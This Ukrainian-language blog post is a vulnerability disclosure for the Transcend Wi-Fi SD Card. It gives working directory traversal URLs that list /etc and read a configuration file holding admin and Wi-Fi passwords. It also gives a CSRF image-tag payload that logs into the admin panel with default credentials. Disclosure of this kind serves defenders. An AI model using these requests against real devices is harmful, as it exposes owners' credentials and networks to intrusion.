Нові уразливості в Transcend Wi-Fi SD Card
23:51 12.05.201828.03.2017
У травні, 10.05.2014, я знайшов Directory Traversal та Cross-Site Request Forgery уразливості в Transcend Wi-Fi SD Card. Це флешка з бездротовим доступом.
Раніше я писав про уразливості в Transcend Wi-Fi SD Card.
Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам пристрою.
12.05.2018
До флеш карти можна під’єднатися в двох режимах: Direct Share та Internet Mode. В першому режимі пристрій з Wi-Fi під’єднується до цієї карти, а в другому режимі сама карта під’єднується до Wi-Fi пристроїв (точки доступу, роутера чи смартфону з увімкненим Personal Hotspot) - тоді всі комп’ютери в LAN отримають до неї доступ. Всі наведені атаки працюють в обох режимах.
Адреса http://192.168.0.70 - це динамічний IP, що виділяється в другому режимі роботи (DHCP на роутері чи AP), адреса буде змінюватися. Тому її потрібно спочатку виявити для атаки. Як то скануванням IP чи в статистиці роутера.
Directory Traversal (WASC-33):
Читання списку директорій:
http://192.168.0.70/cgi-bin/show_pic.cgi?dir=/etc
http://192.168.0.70/cgi-bin/show_video.cgi?dir=/etc
http://192.168.0.70/cgi-bin/file_list.pl?dir=/www/sd/../../etc
Directory Traversal (WASC-33):
Читання довільних файлів (AFD):
http://192.168.0.70/cgi-bin/wifi_download?fn=wsd.conf&fd=/www/sd/../mtd/config
Це файл конфігурації з логіном і паролем до адмінки, до самої карти по Wi-Fi та до точки доступу Wi-Fi.
Cross-Site Request Forgery (WASC-09):
Серед багатьох CSRF уразливостей в адмінці відзначу атаку для віддаленого логіну. В процесі логіна немає капчі, тому окрім відсутності захисту від BF, також можлива CSRF атака. Можна віддалено зайти в адмінку (з логіном і паролем по замовчуванню) для проведення подальших CSRF атак.
<img src=”http://admin:admin@192.168.0.70″>
Transcend Wi-Fi SD Card CSRF.html
Вразлива Transcend Wi-Fi SD Card 16 GB, Firmware v.1.8. Ця модель з іншими прошивками та інші моделі також можуть бути вразливими.